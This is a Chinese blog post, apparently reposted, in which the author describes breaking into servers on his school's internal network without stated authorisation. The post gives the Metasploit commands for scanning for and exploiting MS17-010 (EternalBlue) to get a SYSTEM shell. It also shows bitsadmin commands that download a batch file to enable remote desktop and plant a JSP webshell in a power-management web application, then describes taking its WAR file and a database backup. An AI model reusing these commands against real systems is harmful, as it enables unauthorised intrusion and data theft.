”黑“掉自己的學校，可能是大多數黑闊們學生時代共同的執念。

前言：

心血來潮，突然想看看學校有沒有能用永恒之藍打下來的機器，順便來一波內網滲透，想想上一次測試還是剛爆出永恒之藍的利用工具的時候，那時候msf都還沒整合進去，現在直接就能用msf方便多了。

信息收集：

已知 10.10.10.0/24 為學校各種服務器使用的IP

使用MSF中的批量ms17_010驗證模塊:

msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.0-10.10.10.254rhosts => 10.10.10.0-10.10.10.254msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 20threads => 20msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

掃描的結果如下

漏洞利用：

獲取cmdshell

經測試IP為10.10.10.104的主機（2008 x64）可以成功利用：

該主機關鍵信息：

8080?端口運行著tomcat的服務，3389?端口未開放，3306?運行MySQL服務，其他端口暫不考慮。

• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?

msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target.Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.104rhosts => 10.10.10.104msf5?exploit(windows/smb/ms17_010_eternalblue)?>?run

如下圖成功返回了一個CmdShell，而且還直接是System權限，不過比較疑惑的是，tasklist /SVC 看了下當前進程，有360的主動防御，按道理應該會攔截住的，可能我運氣好吧2333：

cmdshell升級meterpreter（失敗）

由于cmdshell不如meterpreter好用（meterpreter功能比較強大），嘗試升級成meterpreter

第一種方法

• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?
• ?

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter msf5 post(multi/manage/shell_to_meterpreter) > show options Module options (post/multi/manage/shell_to_meterpreter): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 yes Port for payload to connect to. SESSION yes The session to run this module on. msf5 post(multi/manage/shell_to_meterpreter) > set session 1session => 1msf5 post(multi/manage/shell_to_meterpreter) > run

?

第二種方法：

• ?

sessions -u 1

然后不知道為什么失敗了（換個思路吧）：

遠程文件下載：

?

windows自帶的遠程文件下載功能很強大，需要用什么就遠程下載什么好了。

一開始就想直接開端口，加賬號登陸，沒想到遠程連接出現問題了，然后又想到可以拿下shell試試

開啟遠程連接

本機開一個apache服務，把 3389.bat 放到 /var/www/html 下，cmdshell 里執行，下載成功后，運行3389.bat

• ?

bitsadmin?/transfer?n?http://IP/open3389.bat?c:\windows\3389.bat

運行完畢后(記得刪除)，發現3389端口已經開啟了

Kali下連接遠程桌面出了點小問題，百度了下，也沒講多清楚（暫時就放棄了）。

?

不過后來換到win系統上好像就沒問題了，因為當時就想著還是怎么方便怎么來（實體機運行的kali，換回win還得切系統），也就沒抓密碼。

嘗試GetShell

先找到web所在目錄(帶空格的目錄記得用雙引號):

dir c:\ dir "c:\Program Files\" ... dir "c:\Program Files\Apache Software Foundation\Tomcat 7.0\webapps\eleServer\"

看后臺應該是個電力管理系統:

最后決定將shell放在該系統ui框架的某目錄下了

同樣用遠程文件下載jsp大馬到該目錄下

bitsadmin /transfer n http://IP/xieying.jsp "c:\Program?Files\Apache?Software?Foundation\Tomcat?7.0\webapps\eleServer\BJUI\plugins\xieying.jsp"

瀏覽器上訪問大馬并登陸:

結束

感覺再弄無非就是遠程登陸，沒什么必要，翻了翻系統文件，就把這個電力系統的war包，還有備份的數據庫拿了下來，本地自己搭建下，應該就能得到系統的賬號密碼了。

刪了shell，我還是個聽話的好學生。

?

總結

以上是生活随笔為你收集整理的实战|渗透学校某内网服务器的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。